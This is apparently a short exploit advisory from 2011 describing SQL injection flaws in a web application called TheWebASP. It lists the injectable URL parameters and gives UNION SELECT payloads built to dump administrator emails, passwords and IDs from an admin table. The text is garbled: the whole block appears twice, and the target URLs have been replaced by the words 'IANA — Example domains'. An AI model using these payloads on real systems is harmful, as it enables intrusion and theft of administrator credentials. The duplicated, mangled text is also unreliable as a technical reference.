# Exploit Title: TheWebASP - Multiple SQL Injection vulnerabilities
# Date: 8/17/2011
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters:
goods_detail.php?cid=
goods_detail.php?gid=
menu_list.php?cid=
Demo Site ; IANA — Example domains union all select group_concat(adminEmail,0x3a,adminPwd,0x3a,adminId),2,3,4,5,6,7,8,9,10,11,12
FROM admin--
IANA — Example domains union all select 1,2,3,4,group_concat(adminEmail,0x3a,adminPwd,0x3a,adminId),6,7 FROM admin--
# Date: 8/17/2011
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters:
goods_detail.php?cid=
goods_detail.php?gid=
menu_list.php?cid=
Demo Site ; IANA — Example domains union all select group_concat(adminEmail,0x3a,adminPwd,0x3a,adminId),2,3,4,5,6,7,8,9,10,11,12
FROM admin--
IANA — Example domains union all select 1,2,3,4,group_concat(adminEmail,0x3a,adminPwd,0x3a,adminId),6,7 FROM admin--
